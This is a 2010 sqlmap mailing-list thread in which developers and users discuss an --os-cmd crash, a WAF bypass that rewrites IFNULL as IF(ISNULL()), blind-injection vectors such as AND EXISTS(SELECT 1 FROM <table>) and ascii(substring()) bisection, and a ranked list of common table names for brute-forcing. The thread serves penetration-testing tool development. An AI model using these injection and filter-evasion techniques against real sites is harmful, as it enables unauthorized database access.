E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: prashant j. <pra...@gm...> - 2010-09-30 17:30:43
hi,

While testing the --os-cmd=ls in sqlmap 0.9 dev I'm getting the following error.

Please advise. The details are:

URL = sudo python ./sqlmap.py -u "http://xxx/bbb.php?article_id=2322" --os-cmd=ls -v 1

"
[23:06:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.9-dev
Python version: 2.5.2
Operating system: posix
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line 280, in start
    action()
  File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 152, in action
    conf.dbmsHandler.osCmd()
  File "/pentest/database/sqlmap-dev/plugins/generic/takeover.py", line 66, in osCmd
    self.initEnv(web=web)
  File "/pentest/database/sqlmap-dev/lib/takeover/abstraction.py", line 154, in initEnv
    self.webInit()
  File "/pentest/database/sqlmap-dev/lib/takeover/web.py", line 198, in webInit
    uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
  File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 174, in getPage
    conn = urllib2.urlopen(req)
  File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
    return _opener.open(url, data)
  File "/usr/lib/python2.5/urllib2.py", line 381, in open
    response = self._open(req, data)
  File "/usr/lib/python2.5/urllib2.py", line 399, in _open
    '_open', req)
  File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open
    h = http_class(host) # will parse host:port
  File "/usr/lib/python2.5/httplib.py", line 639, in __init__
    self._set_hostport(host, port)
  File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: '80jpma'

[*] shutting down at: 23:06:37
"
From: Miroslav S. <mir...@gm...> - 2010-09-30 12:46:43
interesting. for example, we already have a similar switch --use-between for cases when '>' are filtered in blind injections. we could add a switch for this one like --use-isnull but i am not sure if it will be ever used (except you :). any suggestion is more than welcome.

kr

On Wed, Sep 29, 2010 at 9:55 PM, Carlos Gabriel Vergara <car...@gm...> wrote:
> Hi again. A curious thing: i was working with a server that at some
> point started to throw 403 errors on some injection strings. Doing a
> lot of analisys, i've found out that the string "IFNULL" (MySQL dbms)
> was the problem. Don't know why... this is the first scenario like
> this that i come across. Maybe an apache mod? why this word and not
> another "bad" strings?
>
> So, to fix it, i take a little proxy script in python, captured the
> sqlmap request, and replaced:
>
> IFNULL(arg1, arg2)
>
> ...with...
>
> IF(ISNULL(arg1),arg2,arg1)
>
> ...and worked :)
>
> The apache server header was something like this:
>
> Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1
> mod_bwlimited/1.4 FrontPage/5.0.2.2635
>
> Found little info about that mods...
>
> Someone has the same issue on saw something like this before? This
> time i could bypass the problem because i was sure that the script was
> injectable ("nose" perhaps... no logic explanation), but i'm not sure
> to catch it in the future...
>
> Best regards,
>
> --
> --------8<--------
> Carlos Gabriel Vergara
> http://www.ThorSecurity.com.ar
>
> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
> -------->8--------
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2010-09-30 12:43:18
On Thu, Sep 30, 2010 at 12:52 PM, no-replay <su...@cl...> wrote:
> Better use information_schema.columns then information_schema.tables when
> altering schema, because there we can get tname too and sometimes admin
> block access to inf.sc.tables

note added. currently we use information_schema.tables for fingerprinting and table retrieval on MySQL databases (no alteration). we will consider adding this one too in case of need for failsafe.

>
> And for beter improvement in blind, I suggest to use -- >
> ascii(substring($bla,$bli,$blu))> $number
>
> Because 255 : 2 = 125 --- > 125 : 2 =62 ---- > this will be faster because
> we only find right number

we indeed already do this one. you can find it in lib/techniques/blind/inference.py.

bye

>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2010-09-30 12:32:39
ok. thanks for noting. if i get time i'll also do this one. right now results from plain google search seem to be more than enough.

On Thu, Sep 30, 2010 at 2:02 PM, Andres Riancho <and...@gm...> wrote:
> The script is cool, but my idea was to use google.com/codesearch , which
> will (most likely) give you more hits.
>
> Regards,
> --
> Andres Riancho
>
> On Sep 29, 2010 7:36 p.m., "Miroslav Stampar" <mir...@gm...>
> wrote:
>
> it's a modification of one of my previous scripts. it uses mobile
> google search page because it doesn't have any limitations regarding
> time between two queries.
>
> On Wed, Sep 29, 2010 at 5:08 PM, Andres Riancho
> <and...@gm...> wrote:
>> I'm more interested in the script :)
>>
>> On Wed, Sep 29, 2010 at...
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010...

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2010-09-30 12:31:54
Hi.

Well, basically this feature(s) is mostly done and tested on MySQL, Oracle, PostgreSQL and Firebird. You can try it out by updating to the latest version from our SVN repository.

1) if you just turn switch --common-exists it will use table entries from ./txt/common-tables.txt
2) if you use switch --exists you have to also provide a filename with a list of table names (newline separated) for program to use

Kind regards.

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Andres R. <and...@gm...> - 2010-09-30 12:02:35
The script is cool, but my idea was to use google.com/codesearch , which will (most likely) give you more hits.

Regards,
--
Andres Riancho

On Sep 29, 2010 7:36 p.m., "Miroslav Stampar" <mir...@gm...> wrote:

it's a modification of one of my previous scripts. it uses mobile google search page because it doesn't have any limitations regarding time between two queries.

On Wed, Sep 29, 2010 at 5:08 PM, Andres Riancho <and...@gm...> wrote:
> I'm more interested in the script :)
>
> On Wed, Sep 29, 2010 at...

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010...
From: no-replay <su...@cl...> - 2010-09-30 11:19:28
Better use information_schema.columns than information_schema.tables when altering schema, because there we can get tname too and sometimes admin block access to inf.sc.tables

And for better improvement in blind, I suggest to use -- >
ascii(substring($bla,$bli,$blu)) > $number

Because 255 : 2 = 125 --- > 125 : 2 = 62 ---- > this will be faster because we only find right number
From: Miroslav S. <mir...@gm...> - 2010-09-29 22:36:58
it's a modification of one of my previous scripts. it uses mobile google search page because it doesn't have any limitations regarding time between two queries.

On Wed, Sep 29, 2010 at 5:08 PM, Andres Riancho <and...@gm...> wrote:
> I'm more interested in the script :)
>
> On Wed, Sep 29, 2010 at 11:38 AM, Miroslav Stampar
> <mir...@gm...> wrote:
>> program is done. i've run it partially for first 40 pages of Google
>> results and will leave it to run for whole night for the rest.
>>
>> if someone is interested for the complete sorted list of pairs
>> (table_name, count) give me a private mail and i'll send it to you.
>>
>> kind regards.
>>
>> p.s. first ten are at this moment:
>>
>> users,20
>> user,14
>> comments,12
>> sessions,10
>> categories,10
>> customers,10
>> customer,10
>> orders,9
>> log,8
>> category,7
>>
>> On Wed, Sep 29, 2010 at 2:27 PM, Miroslav Stampar
>> <mir...@gm...> wrote:
>>> to be honest, this is great idea :)
>>>
>>> i've tried it and it really shows some really cool stuff :)
>>>
>>> will do this because i am more than interested what will be the results.
>>>
>>> once again, great idea
>>>
>>> On Wed, Sep 29, 2010 at 2:24 PM, Andres Riancho
>>> <and...@gm...> wrote:
>>>> Maybe if you search google's codesearch for "create table ..." inside. sql
>>>> files and automate the result extraction you would get something really cool
>>>> :)
>>>>
>>>> Regards,
>>>> --
>>>> Andres Riancho
>>>>
>>>> On Sep 29, 2010 9:21 a.m., "Miroslav Stampar" <mir...@gm...>
>>>> wrote:
>>>>
>>>> Hi.
>>>>
>>>> We are currently adding new feature into sqlmap for retrieving table
>>>> names when database (information_) schema is missing and/or sqlmap is
>>>> unable to extract table names via normal ways.
>>>>
>>>> Basic injection vector is: ...AND EXISTS(SELECT 1 FROM <table_name>)...
>>>>
>>>> So, if you have some knowledge to share please do.
>>>>
>>>> PHP, Joomla, Wordpress,... everything is more than welcome, except
>>>> database system tables. We have those more than enough ;)
>>>>
>>>> Bye.
>>>>
>>>> --
>>>> Miroslav Stampar
>>>>
>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>> Mobile: +385921010204 (HR 0921010204)
>>>> PGP Key ID: 0xB5397B1B
>>>> Location: Zagreb, Croatia
>>>>
>>>
>>> --
>>> Miroslav Stampar
>>>
>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>> Mobile: +385921010204 (HR 0921010204)
>>> PGP Key ID: 0xB5397B1B
>>> Location: Zagreb, Croatia
>>>
>>
>> --
>> Miroslav Stampar
>>
>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>> Mobile: +385921010204 (HR 0921010204)
>> PGP Key ID: 0xB5397B1B
>> Location: Zagreb, Croatia
>>
>
> --
> Andrés Riancho
> Founder, Bonsai - Information Security
> http://www.bonsai-sec.com/
> http://w3af.sf.net/
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2010-09-29 22:32:21
yea, for sure

On Wed, Sep 29, 2010 at 9:34 PM, Carlos Gabriel Vergara <car...@gm...> wrote:
> I can contribute with spanish common table names... want 'em?
>
> 2010/9/29 Andres Riancho <and...@gm...>:
>> I'm more interested in the script :)
>>
>> On Wed, Sep 29, 2010 at 11:38 AM, Miroslav Stampar
>> <mir...@gm...> wrote:
>>> program is done. i've run it partially for first 40 pages of Google
>>> results and will leave it to run for whole night for the rest.
>>>
>>> if someone is interested for the complete sorted list of pairs
>>> (table_name, count) give me a private mail and i'll send it to you.
>>>
>>> kind regards.
>>>
>>> p.s. first ten are at this moment:
>>>
>>> users,20
>>> user,14
>>> comments,12
>>> sessions,10
>>> categories,10
>>> customers,10
>>> customer,10
>>> orders,9
>>> log,8
>>> category,7
>>>
>>> On Wed, Sep 29, 2010 at 2:27 PM, Miroslav Stampar
>>> <mir...@gm...> wrote:
>>>> to be honest, this is great idea :)
>>>>
>>>> i've tried it and it really shows some really cool stuff :)
>>>>
>>>> will do this because i am more than interested what will be the results.
>>>>
>>>> once again, great idea
>>>>
>>>> On Wed, Sep 29, 2010 at 2:24 PM, Andres Riancho
>>>> <and...@gm...> wrote:
>>>>> Maybe if you search google's codesearch for "create table ..." inside. sql
>>>>> files and automate the result extraction you would get something really cool
>>>>> :)
>>>>>
>>>>> Regards,
>>>>> --
>>>>> Andres Riancho
>>>>>
>>>>> On Sep 29, 2010 9:21 a.m., "Miroslav Stampar" <mir...@gm...>
>>>>> wrote:
>>>>>
>>>>> Hi.
>>>>>
>>>>> We are currently adding new feature into sqlmap for retrieving table
>>>>> names when database (information_) schema is missing and/or sqlmap is
>>>>> unable to extract table names via normal ways.
>>>>>
>>>>> Basic injection vector is: ...AND EXISTS(SELECT 1 FROM <table_name>)...
>>>>>
>>>>> So, if you have some knowledge to share please do.
>>>>>
>>>>> PHP, Joomla, Wordpress,... everything is more than welcome, except
>>>>> database system tables. We have those more than enough ;)
>>>>>
>>>>> Bye.
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>>
>>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>>> Mobile: +385921010204 (HR 0921010204)
>>>>> PGP Key ID: 0xB5397B1B
>>>>> Location: Zagreb, Croatia
>>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>>
>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>> Mobile: +385921010204 (HR 0921010204)
>>>> PGP Key ID: 0xB5397B1B
>>>> Location: Zagreb, Croatia
>>>>
>>>
>>> --
>>> Miroslav Stampar
>>>
>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>> Mobile: +385921010204 (HR 0921010204)
>>> PGP Key ID: 0xB5397B1B
>>> Location: Zagreb, Croatia
>>>
>>
>> --
>> Andrés Riancho
>> Founder, Bonsai - Information Security
>> http://www.bonsai-sec.com/
>> http://w3af.sf.net/
>>
>
> --
> --------8<--------
> Carlos Gabriel Vergara
> http://www.ThorSecurity.com.ar
>
> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
> -------->8--------
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Carlos G. V. <car...@gm...> - 2010-09-29 19:57:02
Hi again. A curious thing: I was working with a server that at some point started to throw 403 errors on some injection strings. Doing a lot of analysis, I've found out that the string "IFNULL" (MySQL dbms) was the problem. Don't know why... this is the first scenario like this that I come across. Maybe an apache mod? Why this word and not other "bad" strings?

So, to fix it, I took a little proxy script in python, captured the sqlmap request, and replaced:

IFNULL(arg1, arg2)

...with...

IF(ISNULL(arg1),arg2,arg1)

...and it worked :)

The apache server header was something like this:

Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

Found little info about those mods...

Has someone had the same issue or seen something like this before? This time I could bypass the problem because I was sure that the script was injectable ("nose" perhaps... no logical explanation), but I'm not sure I'd catch it in the future...

Best regards,

--
--------8<--------
Carlos Gabriel Vergara
http://www.ThorSecurity.com.ar

PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
-------->8--------